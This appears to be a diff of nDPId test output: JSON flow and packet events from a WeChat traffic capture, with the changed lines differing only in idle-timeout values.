00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Mx1AAEAGXPLAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT2IFAAAAQEICgA\/vqCGKY\/Q"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"wechat.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Mx1AAEAGXPLAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT2IFAAAAQEICgA\/vqCGKY\/Q"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1492171291761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171291761,"pkt":"8IQvSpdgeJKcD6iOCABFAABIMrNAAEARgzzAqAFnwKgB\/tELADUANPxl\/4EBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492171206877,"flow_last_seen":1492171210973,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171267294,"flow_last_seen":1492171269750,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171154216,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"flow_min_l4_payload_len":1188,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":1188,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54183,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 